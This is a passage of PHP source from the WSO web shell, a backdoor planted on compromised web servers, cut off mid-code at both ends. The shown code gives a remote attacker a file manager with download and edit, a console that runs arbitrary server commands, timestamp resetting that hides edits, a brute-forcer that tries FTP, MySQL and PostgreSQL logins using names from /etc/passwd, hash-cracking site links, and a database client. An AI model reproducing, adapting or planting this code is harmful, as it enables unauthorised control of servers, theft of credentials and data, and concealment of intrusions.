if(class_exists('ZipArchive')) {\n \$zip = new ZipArchive();\n foreach(\$_COOKIE['f'] as \$f) {\n if(\$zip->open(\$_COOKIE['c'].\$f)) {\n \$zip->extractTo(\$GLOBALS['cwd']);\n \$zip->close();\n }\n }\n }\n } elseif(\$_COOKIE['act'] == 'tar') {\n chdir(\$_COOKIE['c']);\n \$_COOKIE['f'] = array_map('escapeshellarg', \$_COOKIE['f']);\n wsoEx('tar cfzv ' . escapeshellarg(\$_POST['p2']) . ' ' . implode(' ', \$_COOKIE['f']));\n chdir(\$GLOBALS['cwd']);\n }\n unset(\$_COOKIE['f']);\n setcookie('f', '', time() - 3600);\n break;\n default:\n if(!empty(\$_POST['p1'])) {\n WSOsetcookie('act', \$_POST['p1']);\n WSOsetcookie('f', serialize(@\$_POST['f']));\n WSOsetcookie('c', @\$_POST['c']);\n }\n break;\n }\n }\n wsoHeader();\n echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_=\"\";</script>';\n \$dirContent = wsoScandir(isset(\$_POST['c'])?\$_POST['c']:\$GLOBALS['cwd']);\n if(\$dirContent === false) {\techo 'Can\\'t open this folder!';wsoFooter(); return; }\n global \$sort;\n \$sort = array('name', 1);\n if(!empty(\$_POST['p1'])) {\n if(preg_match('!s_([A-z]+)_(\\d{1})!', \$_POST['p1'], \$match))\n \$sort = array(\$match[1], (int)\$match[2]);\n }\n echo \"<script>\n\t\tfunction sa() {\n\t\t\tfor(i=0;i<d.files.elements.length;i++)\n\t\t\t\tif(d.files.elements[i].type == 'checkbox')\n\t\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\n\t\t}\n\t</script>\n\t<table width='100%' class='main' cellspacing='0' cellpadding='2'>\n\t<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\\\"ff_man\\\",null,\\\"s_name_\".(\$sort[1]?0:1).\"\\\")'>Name</a></th><th><a href='#' onclick='g(\\\"ff_man\\\",null,\\\"s_size_\".(\$sort[1]?0:1).\"\\\")'>Size</a></th><th><a href='#' onclick='g(\\\"ff_man\\\",null,\\\"s_modify_\".(\$sort[1]?0:1).\"\\\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\\\"ff_man\\\",null,\\\"s_perms_\".(\$sort[1]?0:1).\"\\\")'>Permissions</a></th><th>Actions</th></tr>\";\n \$dirs = \$files = array();\n \$n = count(\$dirContent);\n for(\$i=0;\$i<\$n;\$i++) {\n \$ow = @posix_getpwuid(@fileowner(\$dirContent[\$i]));\n \$gr = @posix_getgrgid(@filegroup(\$dirContent[\$i]));\n \$tmp = array('name' => \$dirContent[\$i],\n 'path' => \$GLOBALS['cwd'].\$dirContent[\$i],\n 'modify' => date('Y-m-d H:i:s', @filemtime(\$GLOBALS['cwd'] . \$dirContent[\$i])),\n 'perms' => wsoPermsColor(\$GLOBALS['cwd'] . \$dirContent[\$i]),\n 'size' => @filesize(\$GLOBALS['cwd'].\$dirContent[\$i]),\n 'owner' => \$ow['name']?\$ow['name']:@fileowner(\$dirContent[\$i]),\n 'group' => \$gr['name']?\$gr['name']:@filegroup(\$dirContent[\$i])\n );\n if(@is_file(\$GLOBALS['cwd'] . \$dirContent[\$i]))\n \$files[] = array_merge(\$tmp, array('type' => 'file'));\n elseif(@is_link(\$GLOBALS['cwd'] . \$dirContent[\$i]))\n \$dirs[] = array_merge(\$tmp, array('type' => 'link', 'link' => readlink(\$tmp['path'])));\n elseif(@is_dir(\$GLOBALS['cwd'] . \$dirContent[\$i]))\n \$dirs[] = array_merge(\$tmp, array('type' => 'dir'));\n }\n \$GLOBALS['sort'] = \$sort;\n function wsoCmp(\$a, \$b) {\n if(\$GLOBALS['sort'][0] != 'size')\n return strcmp(strtolower(\$a[\$GLOBALS['sort'][0]]), strtolower(\$b[\$GLOBALS['sort'][0]]))*(\$GLOBALS['sort'][1]?1:-1);\n else\n return ((\$a['size'] < \$b['size']) ? -1 : 1)*(\$GLOBALS['sort'][1]?1:-1);\n }\n usort(\$files, \"wsoCmp\");\n usort(\$dirs, \"wsoCmp\");\n \$files = array_merge(\$dirs, \$files);\n \$l = 0;\n foreach(\$files as \$f) {\n echo '<tr'.(\$l?' class=l_one_area':'').'><td><input type=checkbox name=\"f[]\" value=\"'.urlencode(\$f['name']).'\" class=chkbx></td><td><a href=# onclick=\"'.((\$f['type']=='file')?'g(\\'ff_tools\\',null,\\''.urlencode(\$f['name']).'\\', \\'view\\')\">'.htmlspecialchars(\$f['name']):'g(\\'ff_man\\',\\''.\$f['path'].'\\');\" ' . (empty (\$f['link']) ? '' : \"title='{\$f['link']}'\") . '><b>[ ' . htmlspecialchars(\$f['name']) . ' ]</b>').'</a></td><td>'.((\$f['type']=='file')?wsoViewSize(\$f['size']):\$f['type']).'</td><td>'.\$f['modify'].'</td><td>'.\$f['owner'].'/'.\$f['group'].'</td><td><a href=# onclick=\"g(\\'ff_tools\\',null,\\''.urlencode(\$f['name']).'\\',\\'chmod\\')\">'.\$f['perms']\n .'</td><td><a href=\"#\" onclick=\"g(\\'ff_tools\\',null,\\''.urlencode(\$f['name']).'\\', \\'rename\\')\">R</a> <a href=\"#\" onclick=\"g(\\'ff_tools\\',null,\\''.urlencode(\$f['name']).'\\', \\'touch\\')\">T</a>'.((\$f['type']=='file')?' <a href=\"#\" onclick=\"g(\\'ff_tools\\',null,\\''.urlencode(\$f['name']).'\\', \\'edit\\')\">E</a> <a href=\"#\" onclick=\"g(\\'ff_tools\\',null,\\''.urlencode(\$f['name']).'\\', \\'download\\')\">D</a>':'').'</td></tr>';\n \$l = \$l?0:1;\n }\n echo \"<tr><td colspan=7>\n\t\t<input type=hidden name=a value='ff_man'>\n\t\t<input type=hidden name=c value='\" . htmlspecialchars(\$GLOBALS['cwd']) .\"'>\n\t\t<input type=hidden name=charset value='\". (isset(\$_POST['charset'])?\$_POST['charset']:'').\"'>\n\t\t<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>\";\n if(class_exists('ZipArchive'))\n echo \"<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>\";\n echo \"<option value='tar'>Compress (tar.gz)</option>\";\n if(!empty(\$_COOKIE['act']) && @count(\$_COOKIE['f']))\n echo \"<option value='paste'>Paste / Compress</option>\";\n echo \"</select> \";\n if(!empty(\$_COOKIE['act']) && @count(\$_COOKIE['f']) && ((\$_COOKIE['act'] == 'zip') || (\$_COOKIE['act'] == 'tar')))\n echo \"file name: <input type=text name=p2 value='wso_\" . date(\"Ymd_His\") . \".\" . (\$_COOKIE['act'] == 'zip'?'zip':'tar.gz') . \"'> \";\n echo \"<input type='submit' value='>>'></td></tr></form></table></div>\";\n wsoFooter();\n }\n\n function actionStringTools() {\n if(!function_exists('hex2bin')) {function hex2bin(\$p) {return decbin(hexdec(\$p));}}\n if(!function_exists('binhex')) {function binhex(\$p) {return dechex(bindec(\$p));}}\n if(!function_exists('hex2ascii')) {function hex2ascii(\$p){\$r='';for(\$i=0;\$i<strLen(\$p);\$i+=2){\$r.=chr(hexdec(\$p[\$i].\$p[\$i+1]));}return \$r;}}\n if(!function_exists('ascii2hex')) {function ascii2hex(\$p){\$r='';for(\$i=0;\$i<strlen(\$p);++\$i)\$r.= sprintf('%02X',ord(\$p[\$i]));return strtoupper(\$r);}}\n if(!function_exists('full_urlencode')) {function full_urlencode(\$p){\$r='';for(\$i=0;\$i<strlen(\$p);++\$i)\$r.= '%'.dechex(ord(\$p[\$i]));return strtoupper(\$r);}}\n \$stringTools = array(\n 'Base64 encode' => 'base64_encode',\n 'Base64 decode' => 'base64_decode',\n 'Url encode' => 'urlencode',\n 'Url decode' => 'urldecode',\n 'Full urlencode' => 'full_urlencode',\n 'md5 hash' => 'md5',\n 'sha1 hash' => 'sha1',\n 'crypt' => 'crypt',\n 'CRC32' => 'crc32',\n 'ASCII to HEX' => 'ascii2hex',\n 'HEX to ASCII' => 'hex2ascii',\n 'HEX to DEC' => 'hexdec',\n 'HEX to BIN' => 'hex2bin',\n 'DEC to HEX' => 'dechex',\n 'DEC to BIN' => 'decbin',\n 'BIN to HEX' => 'binhex',\n 'BIN to DEC' => 'bindec',\n 'String to lower case' => 'strtolower',\n 'String to upper case' => 'strtoupper',\n 'Htmlspecialchars' => 'htmlspecialchars',\n 'String length' => 'strlen',\n );\n if(isset(\$_POST['ajax'])) {\n WSOsetcookie(md5(\$_SERVER['HTTP_HOST']).'ajax', true);\n ob_start();\n if(in_array(\$_POST['p1'], \$stringTools))\n echo \$_POST['p1'](\$_POST['p2']);\n \$temp = \"document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='\".addcslashes(htmlspecialchars(ob_get_clean()),\"\\n\\r\\t\\\\'\\0\").\"';\\n\";\n echo strlen(\$temp), \"\\n\", \$temp;\n exit;\n }\n if(empty(\$_POST['ajax'])&&!empty(\$_POST['p1']))\n WSOsetcookie(md5(\$_SERVER['HTTP_HOST']).'ajax', 0);\n wsoHeader();\n echo '<h1>String conversions</h1><div class=content>';\n echo \"<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>\";\n foreach(\$stringTools as \$k => \$v)\n echo \"<option value='\".htmlspecialchars(\$v).\"'>\".\$k.\"</option>\";\n echo \"</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 \".(@\$_COOKIE[md5(\$_SERVER['HTTP_HOST']).'ajax']?'checked':'').\"> send using AJAX<br><textarea name='input' style='margin-top:5px' class=area_main>\".(empty(\$_POST['p1'])?'':htmlspecialchars(@\$_POST['p2'])).\"</textarea></form><pre class='ml_one_area' style='\".(empty(\$_POST['p1'])?'display:none;':'').\"margin-top:5px' id='strOutput'>\";\n if(!empty(\$_POST['p1'])) {\n if(in_array(\$_POST['p1'], \$stringTools))echo htmlspecialchars(\$_POST['p1'](\$_POST['p2']));\n }\n echo\"</pre></div><br><h1>Search files:</h1><div class=content>\n\t\t\t<form onsubmit=\\\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\\\"><table cellpadding='1' cellspacing='0' width='50%'>\n\t\t\t\t<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\n\t\t\t\t<tr><td>Path:</td><td><input type='text' name='cwd' value='\". htmlspecialchars(\$GLOBALS['cwd']) .\"' style='width:100%'></td></tr>\n\t\t\t\t<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>\n\t\t\t\t<tr><td></td><td><input type='submit' value='>>'></td></tr>\n\t\t\t\t</table></form>\";\n\n function wsoRecursiveGlob(\$path) {\n if(substr(\$path, -1) != '/')\n \$path.='/';\n \$paths = @array_unique(@array_merge(@glob(\$path.\$_POST['p3']), @glob(\$path.'*', GLOB_ONLYDIR)));\n if(is_array(\$paths)&&@count(\$paths)) {\n foreach(\$paths as \$item) {\n if(@is_dir(\$item)){\n if(\$path!=\$item)\n wsoRecursiveGlob(\$item);\n } else {\n if(empty(\$_POST['p2']) || @strpos(file_get_contents(\$item), \$_POST['p2'])!==false)\n echo \"<a href='#' onclick='g(\\\"ff_tools\\\",null,\\\"\".urlencode(\$item).\"\\\", \\\"view\\\",\\\"\\\")'>\".htmlspecialchars(\$item).\"</a><br>\";\n }\n }\n }\n }\n if(@\$_POST['p3'])\n wsoRecursiveGlob(\$_POST['c']);\n echo \"</div><br><h1>Search for hash:</h1><div class=content>\n\t\t\t<form method='post' target='_blank' name='hf'>\n\t\t\t\t<input type='text' name='hash' style='width:200px;'><br>\n\t <input type='hidden' name='act' value='find'/>\n\t\t\t\t<input type='button' value='hashcracking.ru' onclick=\\\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\\\"><br>\n\t\t\t\t<input type='button' value='md5.rednoize.com' onclick=\\\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\\\"><br>\n\t <input type='button' value='crackfor.me' onclick=\\\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\\\"><br>\n\t\t\t</form></div>\";\n wsoFooter();\n }\n\n function actionff_tools() {\n if( isset(\$_POST['p1']) )\n \$_POST['p1'] = urldecode(\$_POST['p1']);\n if(@\$_POST['p2']=='download') {\n if(@is_file(\$_POST['p1']) && @is_readable(\$_POST['p1'])) {\n ob_start(\"ob_gzhandler\", 4096);\n header(\"Content-Disposition: attachment; filename=\".basename(\$_POST['p1']));\n if (function_exists(\"mime_content_type\")) {\n \$type = @mime_content_type(\$_POST['p1']);\n header(\"Content-Type: \" . \$type);\n } else\n header(\"Content-Type: application/octet-stream\");\n \$fp = @fopen(\$_POST['p1'], \"r\");\n if(\$fp) {\n while(!@feof(\$fp))\n echo @fread(\$fp, 1024);\n fclose(\$fp);\n }\n }exit;\n }\n if( @\$_POST['p2'] == 'mkfile' ) {\n if(!file_exists(\$_POST['p1'])) {\n \$fp = @fopen(\$_POST['p1'], 'w');\n if(\$fp) {\n \$_POST['p2'] = \"edit\";\n fclose(\$fp);\n }\n }\n }\n wsoHeader();\n echo '<h1>File tools</h1><div class=content>';\n if( !file_exists(@\$_POST['p1']) ) {\n echo 'File not exists';\n wsoFooter();\n return;\n }\n \$uid = @posix_getpwuid(@fileowner(\$_POST['p1']));\n if(!\$uid) {\n \$uid['name'] = @fileowner(\$_POST['p1']);\n \$gid['name'] = @filegroup(\$_POST['p1']);\n } else \$gid = @posix_getgrgid(@filegroup(\$_POST['p1']));\n echo '<span>Name:</span> '.htmlspecialchars(@basename(\$_POST['p1'])).' <span>Size:</span> '.(is_file(\$_POST['p1'])?wsoViewSize(filesize(\$_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor(\$_POST['p1']).' <span>Owner/Group:</span> '.\$uid['name'].'/'.\$gid['name'].'<br>';\n echo '<span>Change time:</span> '.date('Y-m-d H:i:s',filectime(\$_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime(\$_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime(\$_POST['p1'])).'<br><br>';\n if( empty(\$_POST['p2']) )\n \$_POST['p2'] = 'view';\n if( is_file(\$_POST['p1']) )\n \$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');\n else\n \$m = array('Chmod', 'Rename', 'Touch');\n foreach(\$m as \$v)\n echo '<a href=# onclick=\"g(null,null,\\'' . urlencode(\$_POST['p1']) . '\\',\\''.strtolower(\$v).'\\')\">'.((strtolower(\$v)==@\$_POST['p2'])?'<b>[ '.\$v.' ]</b>':\$v).'</a> ';\n echo '<br><br>';\n switch(\$_POST['p2']) {\n case 'view':\n echo '<pre class=ml_one_area>';\n \$fp = @fopen(\$_POST['p1'], 'r');\n if(\$fp) {\n while( !@feof(\$fp) )\n echo htmlspecialchars(@fread(\$fp, 1024));\n @fclose(\$fp);\n }\n echo '</pre>';\n break;\n case 'highlight':\n if( @is_readable(\$_POST['p1']) ) {\n echo '<div class=ml_one_area style=\"background-color: #e1e1e1;color:black;\">';\n \$code = @highlight_file(\$_POST['p1'],true);\n echo str_replace(array('<span ','</span>'), array('<font ','</font>'),\$code).'</div>';\n }\n break;\n case 'chmod':\n if( !empty(\$_POST['p3']) ) {\n \$perms = 0;\n for(\$i=strlen(\$_POST['p3'])-1;\$i>=0;--\$i)\n \$perms += (int)\$_POST['p3'][\$i]*pow(8, (strlen(\$_POST['p3'])-\$i-1));\n if(!@chmod(\$_POST['p1'], \$perms))\n echo 'Can\\'t set permissions!<br><script>document.mf.p3.value=\"\";</script>';\n }\n clearstatcache();\n echo '<script>p3_=\"\";</script><form onsubmit=\"g(null,null,\\'' . urlencode(\$_POST['p1']) . '\\',null,this.chmod.value);return false;\"><input type=text name=chmod value=\"'.substr(sprintf('%o', fileperms(\$_POST['p1'])),-4).'\"><input type=submit value=\">>\"></form>';\n break;\n case 'edit':\n if( !is_writable(\$_POST['p1'])) {\n echo 'File isn\\'t wr-le';\n break;\n }\n if( !empty(\$_POST['p3']) ) {\n \$time = @filemtime(\$_POST['p1']);\n \$_POST['p3'] = substr(\$_POST['p3'],1);\n \$fp = @fopen(\$_POST['p1'],\"w\");\n if(\$fp) {\n @fwrite(\$fp,\$_POST['p3']);\n @fclose(\$fp);\n echo 'Saved!<br><script>p3_=\"\";</script>';\n @touch(\$_POST['p1'],\$time,\$time);\n }\n }\n echo '<form onsubmit=\"g(null,null,\\'' . urlencode(\$_POST['p1']) . '\\',null,\\'1\\'+this.text.value);return false;\"><textarea name=text class=area_main>';\n \$fp = @fopen(\$_POST['p1'], 'r');\n if(\$fp) {\n while( !@feof(\$fp) )\n echo htmlspecialchars(@fread(\$fp, 1024));\n @fclose(\$fp);\n }\n echo '</textarea><input type=submit value=\">>\"></form>';\n break;\n case 'hexdump':\n \$c = @file_get_contents(\$_POST['p1']);\n \$n = 0;\n \$h = array('00000000<br>','','');\n \$len = strlen(\$c);\n for (\$i=0; \$i<\$len; ++\$i) {\n \$h[1] .= sprintf('%02X',ord(\$c[\$i])).' ';\n switch ( ord(\$c[\$i]) ) {\n case 0: \$h[2] .= ' '; break;\n case 9: \$h[2] .= ' '; break;\n case 10: \$h[2] .= ' '; break;\n case 13: \$h[2] .= ' '; break;\n default: \$h[2] .= \$c[\$i]; break;\n }\n \$n++;\n if (\$n == 32) {\n \$n = 0;\n if (\$i+1 < \$len) {\$h[0] .= sprintf('%08X',\$i+1).'<br>';}\n \$h[1] .= '<br>';\n \$h[2] .= \"\\n\";\n }\n }\n echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style=\"font-weight: normal;\"><pre>'.\$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.\$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars(\$h[2]).'</pre></td></tr></table>';\n break;\n case 'rename':\n if( !empty(\$_POST['p3']) ) {\n if(!@rename(\$_POST['p1'], \$_POST['p3']))\n echo 'Can\\'t rename!<br>';\n else\n die('<script>g(null,null,\"'.urlencode(\$_POST['p3']).'\",null,\"\")</script>');\n }\n echo '<form onsubmit=\"g(null,null,\\'' . urlencode(\$_POST['p1']) . '\\',null,this.name.value);return false;\"><input type=text name=name value=\"'.htmlspecialchars(\$_POST['p1']).'\"><input type=submit value=\">>\"></form>';\n break;\n case 'touch':\n if( !empty(\$_POST['p3']) ) {\n \$time = strtotime(\$_POST['p3']);\n if(\$time) {\n if(!touch(\$_POST['p1'],\$time,\$time))\n echo 'Fail!';\n else\n echo 'Touched!';\n } else echo 'Bad time format!';\n }\n clearstatcache();\n echo '<script>p3_=\"\";</script><form onsubmit=\"g(null,null,\\'' . urlencode(\$_POST['p1']) . '\\',null,this.touch.value);return false;\"><input type=text name=touch value=\"'.date(\"Y-m-d H:i:s\", @filemtime(\$_POST['p1'])).'\"><input type=submit value=\">>\"></form>';\n break;\n }\n echo '</div>';\n wsoFooter();\n }\n\n function actionConsole() {\n if(!empty(\$_POST['p1']) && !empty(\$_POST['p2'])) {\n WSOsetcookie(md5(\$_SERVER['HTTP_HOST']).'stderr_to_out', true);\n \$_POST['p1'] .= ' 2>&1';\n } elseif(!empty(\$_POST['p1']))\n WSOsetcookie(md5(\$_SERVER['HTTP_HOST']).'stderr_to_out', 0);\n\n if(isset(\$_POST['ajax'])) {\n WSOsetcookie(md5(\$_SERVER['HTTP_HOST']).'ajax', true);\n ob_start();\n echo \"d.cf.cmd.value='';\\n\";\n \$temp = @iconv(\$_POST['charset'], 'UTF-8', addcslashes(\"\\n\$ \".\$_POST['p1'].\"\\n\".wsoEx(\$_POST['p1']),\"\\n\\r\\t\\\\'\\0\"));\n if(preg_match(\"!.*cd\\s+([^;]+)\$!\",\$_POST['p1'],\$match))\t{\n if(@chdir(\$match[1])) {\n \$GLOBALS['cwd'] = @getcwd();\n echo \"c_='\".\$GLOBALS['cwd'].\"';\";\n }\n }\n echo \"d.cf.output.value+='\".\$temp.\"';\";\n echo \"d.cf.output.scrollTop = d.cf.output.scrollHeight;\";\n \$temp = ob_get_clean();\n echo strlen(\$temp), \"\\n\", \$temp;\n exit;\n }\n if(empty(\$_POST['ajax'])&&!empty(\$_POST['p1']))\n WSOsetcookie(md5(\$_SERVER['HTTP_HOST']).'ajax', 0);\n wsoHeader();\n echo \"<script>\n\tif(window.Event) window.captureEvents(Event.KEYDOWN);\n\tvar cmds = new Array('');\n\tvar cur = 0;\n\tfunction kp(e) {\n\t\tvar n = (window.Event) ? e.which : e.keyCode;\n\t\tif(n == 38) {\n\t\t\tcur--;\n\t\t\tif(cur>=0)\n\t\t\t\tdocument.cf.cmd.value = cmds[cur];\n\t\t\telse\n\t\t\t\tcur++;\n\t\t} else if(n == 40) {\n\t\t\tcur++;\n\t\t\tif(cur < cmds.length)\n\t\t\t\tdocument.cf.cmd.value = cmds[cur];\n\t\t\telse\n\t\t\t\tcur--;\n\t\t}\n\t}\n\tfunction add(cmd) {\n\t\tcmds.pop();\n\t\tcmds.push(cmd);\n\t\tcmds.push('');\n\t\tcur = cmds.length-1;\n\t}\n\t</script>\";\n echo '<h1>Console</h1><div class=content><form name=cf onsubmit=\"if(d.cf.cmd.value==\\'clear\\'){d.cf.output.value=\\'\\';d.cf.cmd.value=\\'\\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\\'\\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\\'\\');} return false;\"><select name=alias>';\n foreach(\$GLOBALS['aliases'] as \$n => \$v) {\n if(\$v == '') {\n echo '<optgroup label=\"-'.htmlspecialchars(\$n).'-\"></optgroup>';\n continue;\n }\n echo '<option value=\"'.htmlspecialchars(\$v).'\">'.\$n.'</option>';\n }\n\n echo '</select><input type=button onclick=\"add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\'\\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\'\\');}\" value=\">>\"> <nobr><input type=checkbox name=ajax value=1 '.(@\$_COOKIE[md5(\$_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty(\$_POST['p2'])||\$_COOKIE[md5(\$_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=area_main name=output style=\"border-bottom:0;margin:0;\" readonly>';\n if(!empty(\$_POST['p1'])) {\n echo htmlspecialchars(\"\$ \".\$_POST['p1'].\"\\n\".wsoEx(\$_POST['p1']));\n }\n echo '</textarea><table style=\"border:1px solid #df5;background-color:#555;border-top:0px;\" cellpadding=0 cellspacing=0 width=\"100%\"><tr><td width=\"1%\">\$</td><td><input type=text name=cmd style=\"border:0px;width:100%;\" onkeydown=\"kp(event);\"></td></tr></table>';\n echo '</form></div><script>d.cf.cmd.focus();</script>';\n wsoFooter();\n }\n\n function actionLogout() {\n setcookie(md5(\$_SERVER['HTTP_HOST']), '', time() - 3600);\n die('bye!');\n }\n\n function actionSelfRemove() {\n\n if(\$_POST['p1'] == 'yes')\n if(@unlink(preg_replace('!\\(\\d+\\)\\s.*!', '', __FILE__)))\n die('Shell has been removed');\n else\n echo 'unlink error!';\n if(\$_POST['p1'] != 'yes')\n wsoHeader();\n echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick=\"g(null,null,\\'yes\\')\">Yes</a></div>';\n wsoFooter();\n }\n\n function actionBruteforce() {\n wsoHeader();\n if( isset(\$_POST['proto']) ) {\n echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars(\$_POST['proto']).' <span>Server:</span> '.htmlspecialchars(\$_POST['server']).'<br>';\n if( \$_POST['proto'] == 'ftp' ) {\n function wsoBruteForce(\$ip,\$port,\$login,\$pass) {\n \$fp = @ftp_connect(\$ip, \$port?\$port:21);\n if(!\$fp) return false;\n \$res = @ftp_login(\$fp, \$login, \$pass);\n @ftp_close(\$fp);\n return \$res;\n }\n } elseif( \$_POST['proto'] == 'mysql' ) {\n function wsoBruteForce(\$ip,\$port,\$login,\$pass) {\n \$res = @mysql_connect(\$ip.':'.(\$port?\$port:3306), \$login, \$pass);\n @mysql_close(\$res);\n return \$res;\n }\n } elseif( \$_POST['proto'] == 'pgsql' ) {\n function wsoBruteForce(\$ip,\$port,\$login,\$pass) {\n \$str = \"host='\".\$ip.\"' port='\".\$port.\"' user='\".\$login.\"' password='\".\$pass.\"' dbname=postgres\";\n \$res = @pg_connect(\$str);\n @pg_close(\$res);\n return \$res;\n }\n }\n \$success = 0;\n \$attempts = 0;\n \$server = explode(\":\", \$_POST['server']);\n if(\$_POST['type'] == 1) {\n \$temp = @file('/etc/passwd');\n if( is_array(\$temp) )\n foreach(\$temp as \$line) {\n \$line = explode(\":\", \$line);\n ++\$attempts;\n if( wsoBruteForce(@\$server[0],@\$server[1], \$line[0], \$line[0]) ) {\n \$success++;\n echo '<b>'.htmlspecialchars(\$line[0]).'</b>:'.htmlspecialchars(\$line[0]).'<br>';\n }\n if(@\$_POST['reverse']) {\n \$tmp = \"\";\n for(\$i=strlen(\$line[0])-1; \$i>=0; --\$i)\n \$tmp .= \$line[0][\$i];\n ++\$attempts;\n if( wsoBruteForce(@\$server[0],@\$server[1], \$line[0], \$tmp) ) {\n \$success++;\n echo '<b>'.htmlspecialchars(\$line[0]).'</b>:'.htmlspecialchars(\$tmp);\n }\n }\n }\n } elseif(\$_POST['type'] == 2) {\n \$temp = @file(\$_POST['dict']);\n if( is_array(\$temp) )\n foreach(\$temp as \$line) {\n \$line = trim(\$line);\n ++\$attempts;\n if( wsoBruteForce(\$server[0],@\$server[1], \$_POST['login'], \$line) ) {\n \$success++;\n echo '<b>'.htmlspecialchars(\$_POST['login']).'</b>:'.htmlspecialchars(\$line).'<br>';\n }\n }\n }\n echo \"<span>Attempts:</span> \$attempts <span>Success:</span> \$success</div><br>\";\n }\n echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'\n .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'\n .'<input type=hidden name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">'\n .'<input type=hidden name=a value=\"'.htmlspecialchars(\$_POST['a']).'\">'\n .'<input type=hidden name=charset value=\"'.htmlspecialchars(\$_POST['charset']).'\">'\n .'<span>Server:port</span></td>'\n .'<td><input type=text name=server value=\"127.0.0.1\"></td></tr>'\n .'<tr><td><span>Brute type</span></td>'\n .'<td><label><input type=radio name=type value=\"1\" checked> /etc/passwd</label></td></tr>'\n .'<tr><td></td><td><label style=\"padding-left:15px\"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'\n .'<tr><td></td><td><label><input type=radio name=type value=\"2\"> Dictionary</label></td></tr>'\n .'<tr><td></td><td><table style=\"padding-left:15px\"><tr><td><span>Login</span></td>'\n .'<td><input type=text name=login value=\"root\"></td></tr>'\n .'<tr><td><span>Dictionary</span></td>'\n .'<td><input type=text name=dict value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'passwd.dic\"></td></tr></table>'\n .'</td></tr><tr><td></td><td><input type=submit value=\">>\"></td></tr></form></table>';\n echo '</div><br>';\n wsoFooter();\n }\n\n function actionSql() {\n class DbClass {\n var \$type;\n var \$link;\n var \$res;\n function __construct(\$type)\t{\n \$this->type = \$type;\n }\n function connect(\$host, \$user, \$pass, \$dbname){\n switch(\$this->type)\t{\n case 'mysql':\n if( \$this->link = @mysql_connect(\$host,\$user,\$pass,true) ) return true;\n break;\n case 'pgsql':\n \$host = explode(':', \$host);\n if(!\$host[1]) \$host[1]=5432;\n if( \$this->link = @pg_connect(\"host={\$host[0]} port={\$host[1]} user=\$user password=\$pass dbname=\$dbname\") ) return true;\n break;\n }\n return false;\n }\n function selectdb(\$db) {\n switch(\$this->type)\t{\n case 'mysql':\n if (@mysql_select_db(\$db))return true;\n break;\n }\n return false;\n }\n function query(\$str) {\n switch(\$this->type) {\n case 'mysql':\n return \$this->res = @mysql_query(\$str);\n break;\n case 'pgsql':\n return \$this->res = @pg_query(\$this->link,\$str);\n break;\n }\n return false;\n }\n function fetch() {\n \$res = func_num_args()?func_get_arg(0):\$this->res;\n switch(\$this->type)\t{\n case 'mysql':\n return @mysql_fetch_assoc(\$res);\n break;\n case 'pgsql':\n return @pg_fetch_assoc(\$res);\n break;\n }\n return false;\n }\n function listDbs() {\n switch(\$this->type)\t{\n case 'mysql':\n return \$this->query(\"SHOW databases\");\n break;\n case 'pgsql':\n return \$this->res = \$this->query(\"SELECT datname FROM pg_database WHERE datistemplate!='t'\");\n break;\n }\n return false;\n }\n function listTables() {\n switch(\$this->type)\t{\n case 'mysql':\n return \$this->res = \$this->query('SHOW TABLES');\n break;\n case 'pgsql':\n return \$this->res = \$this->query(\"select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'\");\n break;\n }\n return false;\n }\n function error() {\n switch(\$this->type)\t{\n case 'mysql':\n return @mysql_error();\n break;\n case 'pgsql':\n return @pg_last_error();\n break;\n }\n return false;\n }\n function setCharset(\$str) {\n switch(\$this->type)\t{\n case 'mysql':\n if(function_exists('mysql_set_charset'))\n return @mysql_set_charset(\$str, \$this->link);\n else\n \$this->query('SET CHARSET '.\$str);\n break;\n case 'pgsql':\n return @pg_set_client_encoding(\$this->link, \$str);\n break;\n }\n return false;\n }\n function loadFile(\$str) {\n switch(\$this->type)\t{\n case 'mysql':\n return 